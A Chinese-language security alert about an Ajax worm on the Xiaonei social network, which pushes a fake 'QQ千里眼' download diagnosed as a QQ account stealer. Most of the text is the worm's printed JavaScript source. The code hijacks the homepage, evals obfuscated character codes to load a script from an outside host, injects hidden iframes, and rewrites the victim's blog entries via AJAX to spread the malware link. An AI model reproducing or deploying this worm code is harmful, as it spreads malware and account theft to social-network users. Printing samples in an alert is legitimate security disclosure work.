千橡国际 校内网 Ajax蠕虫大爆发!!!
传播方式:Ajax蠕虫强制性分享一篇“十二星男女生爱情大骗术(哇咧~天秤好准~!!!>_<)”(URL:http://blog请勿访问.xiaonei.com/GetEntry.do?id=369970722&owner=229461699)
配合钓鱼(Phishing)。
特征:自动在日志中加入“最后推荐一个东西: 发现了好软件,QQ千里眼,能够强制与任何QQ视频,能够强制加好友,强制聊天,迫使下线!下载地址”
威胁:初步诊断为QQ盗号工具
解决方案:暂无。(由于暂时无法得到Javascript样本,所以无法解决。个人之力很难搞定,需要校内那边技术人员的配合)
替代方案:使用手机校内(因为手机不支持Ajax)
可执行文件MD5: 53d9b84d6a8aab02dfb94ea877f6e7ac
可执行文件大小:61,440 Bytes
开发语言:VB6.0
时间戳:0x4A20B8D0
Ajax蠕虫源代码
function killErrors() {return true;}
window.οnerrοr=killErrors;
function defaul_home(aaa){
aaa.style.behavior='url(#default#homepage)';
aaa.setHomePage('http://www.baidu.com/index.php?tn=haijin0212_pg');
}
function hit(aaa){
for(i=1;i<10;i++){
if(window.xxx!=1){
defaul_home(aaa);
}
}
window.xxx=1;
}
//document.all.blogpage.οnclick=Function("hit(document.all.blogpage)");
//----------------------------
var mydata;
var mylink="http://love.avtupian.com/a/x/qiaoye.html";
getinfo();
function getinfo(){
var mylink=document.getElementById("link").value;
var mytype=document.getElementById("type").value;
var mytitle=document.getElementById("title").value;
var mypic=document.getElementById("pic").value;
var myfromno=document.getElementById("fromno").value;
var myfromname=document.getElementById("fromname").value;
var myfromuniv=document.getElementById("fromuniv").value;
var myalbumid=document.getElementById("albumid").value;
var mysummary=document.getElementById("summary").innerText;
var mylargeurl=document.getElementById("largeurl").value;
mydata='post=%7B%22link%22%3A%22'+escape(mylink);
mydata+='%22%2C%22type%22%3A%22'+escape(mytype);
mydata+='%22%2C%22title%22%3A%22'+encodeURIComponent(mytitle);
mydata+='%22%2C%22pic%22%3A%22'+escape(mypic);
mydata+='%22%2C%22fromno%22%3A%22'+escape(myfromno);
mydata+='%22%2C%22fromname%22%3A%22'+encodeURIComponent(myfromname);
mydata+='%22%2C%22fromuniv%22%3A%22'+encodeURIComponent(myfromuniv);
mydata+='%22%2C%22albumid%22%3A%22'+escape(myalbumid);
mydata+='%22%2C%22largeurl%22%3A%22'+escape(mylargeurl);
mydata+='%22%2C%22summary%22%3A%22'+encodeURIComponent(mysummary);
mydata=mydata.replace(g,'%2F');
}
document.getElementById("logo").innerHTML+='<iframe name=do_it id=do_it src="http://share.xiaonei.com/ajaxProxy.html?ver=2" width=0 height=0></iframe>';
setTimeout("appendjs()",2600);
function appendjs(){
document.frames("do_it").document.getElementsByTagName("body").item(0).innerHTML='<img src="http://r.dd/EE?E='+Math.random()+'" οnerrοr="eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,13,10,115,46,115,114,99,61,39,104,116,116,112,58,47,47,108,111,118,101,46,97,118,116,117,112,105,97,110,46,99,111,109,47,97,47,120,47,115,46,106,112,103,39,59,13,10,115,46,116,121,112,101,61,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,13,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,46,105,116,101,109,40,48,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,13,10))"><div id=eer name=eer>'+mydata+'</div>';
}
//===============================================================================================
var mytitle;var mybody;var mytsc;var myid;var userurl;var guest;var targetblogurlid="0";
var myblogurl=new Array();var myblogid=new Array();var b_index;
var guest2;
var visitorID=$("logo").firstChild.firstChild.href;
var IDs=visitorID.indexOf("?id=");
visitorID=visitorID.substring(IDs+4);
var mydomain=document.location.href;
var mydomaint=mydomain.indexOf("blog.xiaonei.com");
var myo=mydomain.indexOf(visitorID);
if(mydomaint!=-1&&myo==-1){setTimeout("get_my_blogurl()",400);}
function get_my_blogurl(){
var as=new Ajax.Request("http://blog.xiaonei.com/MyBlog.do",{method:"get",onComplete:add_my_blogurl,onFailure:add_my_blogurl});
return as;
}
function add_my_blogurl(r){
var mybloglist=r.responseText;
var myurls;var blogids;var blogide;
for(i=0;i<10;i++){
myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
//mybloglist=mybloglist.substring(myurls+10);
//myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
if(myurls!=-1){
mybloglist=mybloglist.substring(myurls);
myurls=mybloglist.indexOf('"');
mybloglist=mybloglist.substring(myurls+1);
myurls=mybloglist.indexOf('"');
myblogurl[i]=mybloglist.substring(0,myurls-1);mybloglist=mybloglist.substring(myurls+1);
blogids=myblogurl[i].indexOf("?id=");blogide=myblogurl[i].indexOf("&owner");
myblogid[i]=myblogurl[i].substring(blogids+4,blogide);
//document.getElementById("blogContent").innerHTML+="<br><a href=eee.com >i="+i+";</a>"+myblogid[i];
}else{break;}
}
get_my_testself();
}
//-------------------------------------
function get_my_testself(){
targetblogurlid=0;
for(i=0;i<myblogid.length;i++){
//var url="http://blog.xiaonei.com/GetEntry.do?id="+myblogid[i]+"&owner="+visitorID;
var url="http://blog.xiaonei.com/EditEntry.do?id="+myblogid[i];
var xhr2=createXMLHttpRequest();
if(xhr2){
xhr2.open("GET",url,false);
xhr2.send();guest2=xhr2.responseText;
}
var mycheckit=guest2.indexOf("skycn");
if(mycheckit==-1){targetblogurlid=myblogid[i];b_index=i;break;}
}
if(targetblogurlid!=0){add_my_form(targetblogurlid);}
}
//---------------------------------------------------------------add--form
function add_my_form(r){
guest=guest2;
var texts=guest.indexOf('name="title"');
guest=guest.substring(texts);
var titles=guest.indexOf('value="');
var titlee=guest.indexOf('" />');
mytitle=guest.substring(titles+7,titlee);
mytitle=mytitle.replace(/&/g,'&').replace(/"/g,'/"').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"');
mytitle=encodeURI(mytitle);
guest=guest.substring(titlee);
var bodys=guest.indexOf('name="body"');
var bodye=guest.indexOf('</textarea>');
mybody=guest.substring(bodys+30,bodye);
mybody=mybody.replace(/&/g,'&').replace(/"/g,'/"').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"');
mybody+='<p><br>最后推荐一个东西:<br><br>发现了好软件,QQ千里眼,能够强制与任何QQ视频,能够强制加好友,强制聊天,迫使下线!<br>下载地址:<a href="http://tan.itwenba.cn/qq/QQqianliyan.rar" target=_blank >天空下载中心:skycn</a></p>';
mybody=encodeURI(mybody);
myxiugai();
}
function myxiugai(){
userurl="http://blog.xiaonei.com/EditEntry.do";
var fdata="title="+mytitle+"&body="+mybody+"&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=0&pic_path=&owner="+visitorID+"&relative_optype=&id="+targetblogurlid;
var xhr=createXMLHttpRequest();
fdata=fdata.replace(g,'%2F');
fdata=fdata.replace(/%09/g,'');
fdata=fdata.replace(/%0D%0A/g,'');
if(xhr){
xhr.open("POST",userurl,false);
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xhr.send(fdata);
}
}
//--------------------------------
function createXMLHttpRequest(){
var XMLhttpObject=null;
if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}
else
{ var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];
for(var i=0;i<MSXML.length;i++)
{
try
{
XMLhttpObject=new ActiveXObject(MSXML[i]);
break;
}
catch (ex) {
}
}
}
return XMLhttpObject;
}
//---------------------------------------
setTimeout("myshua()",200);
function myshua(){
document.getElementById("optiondropdownMenu").insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://love.avtupian.com/ip.asp'></iframe>");
}